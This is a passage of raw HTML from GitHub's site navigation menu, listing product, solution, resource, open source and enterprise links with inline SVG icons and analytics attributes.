href="https://github.com/features/codespaces"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"issues","context":"product","tag":"link","label":"issues_link_product_navbar"}" href="https://github.com/features/issues"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path> </svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"code_review","context":"product","tag":"link","label":"code_review_link_product_navbar"}" href="https://github.com/features/code-review"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Review</div> Manage code changes </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"discussions","context":"product","tag":"link","label":"discussions_link_product_navbar"}" href="https://github.com/features/discussions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"code_search","context":"product","tag":"link","label":"code_search_link_product_navbar"}" href="https://github.com/features/code-search"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-square color-fg-subtle mr-3"> <path d="M10.3 8.24a.75.75 0 0 1-.04 1.06L7.352 12l2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M2 3.75C2 2.784 2.784 2 3.75 2h16.5c.966 0 1.75.784 1.75 1.75v16.5A1.75 1.75 0 0 1 20.25 22H3.75A1.75 1.75 0 0 1 2 20.25Zm1.75-.25a.25.25 0 0 0-.25.25v16.5c0 .138.112.25.25.25h16.5a.25.25 0 0 0 .25-.25V3.75a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Search</div> Find more, search less </div> </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="product-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="product-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"all_features","context":"product","tag":"link","label":"all_features_link_product_navbar"}" href="https://github.com/features"> All features </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"documentation","context":"product","tag":"link","label":"documentation_link_product_navbar"}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"github_skills","context":"product","tag":"link","label":"github_skills_link_product_navbar"}" href="https://skills.github.com"> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"blog","context":"product","tag":"link","label":"blog_link_product_navbar"}" href="https://github.blog"> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 pb-lg-3 mb-3 mb-lg-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-company-size-heading">By company size</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-company-size-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"enterprises","context":"solutions","tag":"link","label":"enterprises_link_solutions_navbar"}" href="https://github.com/enterprise"> Enterprises </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"small_and_medium_teams","context":"solutions","tag":"link","label":"small_and_medium_teams_link_solutions_navbar"}" href="https://github.com/team"> Small and medium teams </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"startups","context":"solutions","tag":"link","label":"startups_link_solutions_navbar"}" href="https://github.com/enterprise/startups"> Startups </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"nonprofits","context":"solutions","tag":"link","label":"nonprofits_link_solutions_navbar"}" href="/solutions/industry/nonprofits"> Nonprofits </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-use-case-heading">By use case</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-use-case-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devsecops","context":"solutions","tag":"link","label":"devsecops_link_solutions_navbar"}" href="/solutions/use-case/devsecops"> DevSecOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"solutions","tag":"link","label":"devops_link_solutions_navbar"}" href="/solutions/use-case/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ci_cd","context":"solutions","tag":"link","label":"ci_cd_link_solutions_navbar"}" href="/solutions/use-case/ci-cd"> CI/CD </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_use_cases","context":"solutions","tag":"link","label":"view_all_use_cases_link_solutions_navbar"}" href="/solutions/use-case"> View all use cases </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-industry-heading">By industry</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-industry-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"healthcare","context":"solutions","tag":"link","label":"healthcare_link_solutions_navbar"}" href="/solutions/industry/healthcare"> Healthcare </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"financial_services","context":"solutions","tag":"link","label":"financial_services_link_solutions_navbar"}" href="/solutions/industry/financial-services"> Financial services </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"manufacturing","context":"solutions","tag":"link","label":"manufacturing_link_solutions_navbar"}" href="/solutions/industry/manufacturing"> Manufacturing </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"government","context":"solutions","tag":"link","label":"government_link_solutions_navbar"}" href="/solutions/industry/government"> Government </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_industries","context":"solutions","tag":"link","label":"view_all_industries_link_solutions_navbar"}" href="/solutions/industry"> View all industries </a></li> </ul> </div> </div> <div class="HeaderMenu-trailing-link rounded-bottom-2 flex-shrink-0 mt-lg-4 px-lg-4 py-4 py-lg-3 f5 text-semibold"> <a href="/solutions"> View all solutions <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-right HeaderMenu-trailing-link-icon"> <path d="M6.22 3.22a.75.75 0 0 1 1.06 0l4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L9.94 8 6.22 4.28a.75.75 0 0 1 0-1.06Z"></path> </svg> </a> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Resources <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-topics-heading">Topics</span> <ul class="list-style-none f5" aria-labelledby="resources-topics-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ai","context":"resources","tag":"link","label":"ai_link_resources_navbar"}" href="/resources/articles/ai"> AI </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"resources","tag":"link","label":"devops_link_resources_navbar"}" href="/resources/articles/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"security","context":"resources","tag":"link","label":"security_link_resources_navbar"}" href="/resources/articles/security"> Security </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"software_development","context":"resources","tag":"link","label":"software_development_link_resources_navbar"}" href="/resources/articles/software-development"> Software Development </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all","context":"resources","tag":"link","label":"view_all_link_resources_navbar"}" href="/resources/articles"> View all </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="resources-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"learning_pathways","context":"resources","tag":"link","label":"learning_pathways_link_resources_navbar"}" href="https://resources.github.com/learn/pathways"> Learning Pathways <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"events_amp_webinars","context":"resources","tag":"link","label":"events_amp_webinars_link_resources_navbar"}" href="https://resources.github.com"> Events & Webinars <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ebooks_amp_whitepapers","context":"resources","tag":"link","label":"ebooks_amp_whitepapers_link_resources_navbar"}" href="https://github.com/resources/whitepapers"> Ebooks & Whitepapers </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"customer_stories","context":"resources","tag":"link","label":"customer_stories_link_resources_navbar"}" href="https://github.com/customer-stories"> Customer Stories </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"partners","context":"resources","tag":"link","label":"partners_link_resources_navbar"}" href="https://partner.github.com"> Partners <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"executive_insights","context":"resources","tag":"link","label":"executive_insights_link_resources_navbar"}" href="https://github.com/solutions/executive-insights"> Executive Insights </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"github_sponsors","context":"open_source","tag":"link","label":"github_sponsors_link_open_source_navbar"}" href="/sponsors"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"the_readme_project","context":"open_source","tag":"link","label":"the_readme_project_link_open_source_navbar"}" href="https://github.com/readme"> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="open-source-repositories-heading">Repositories</span> <ul class="list-style-none f5" aria-labelledby="open-source-repositories-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"topics","context":"open_source","tag":"link","label":"topics_link_open_source_navbar"}" href="https://github.com/topics"> Topics </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"trending","context":"open_source","tag":"link","label":"trending_link_open_source_navbar"}" href="https://github.com/trending"> Trending </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"collections","context":"open_source","tag":"link","label":"collections_link_open_source_navbar"}" href="https://github.com/collections"> Collections </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Enterprise <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"enterprise_platform","context":"enterprise","tag":"link","label":"enterprise_platform_link_enterprise_navbar"}" href="/enterprise"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-stack color-fg-subtle mr-3"> <path d="M11.063 1.456a1.749 1.749 0 0 1 1.874 0l8.383 5.316a1.751 1.751 0 0 1 0 2.956l-8.383 5.316a1.749 1.749 0 0 1-1.874 0L2.68 9.728a1.751 1.751 0 0 1 0-2.956Zm1.071 1.267a.25.25 0 0 0-.268 0L3.483 8.039a.25.25 0 0 0 0 .422l8.383 5.316a.25.25 0 0 0 .268 0l8.383-5.316a.25.25 0 0 0 0-.422Z"></path><path d="M1.867 12.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path><path d="M1.867 16.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path> </svg> <div> <div class="color-fg-default h4">Enterprise platform</div> AI-powered developer platform </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="enterprise-available-add-ons-heading">Available add-ons</span> <ul class="list-style-none f5" aria-labelledby="enterprise-available-add-ons-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"advanced_security","context":"enterprise","tag":"link","label":"advanced_security_link_enterprise_navbar"}" href="https://github.com/enterprise/advanced-security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">Advanced Security</div> Enterprise-grade security 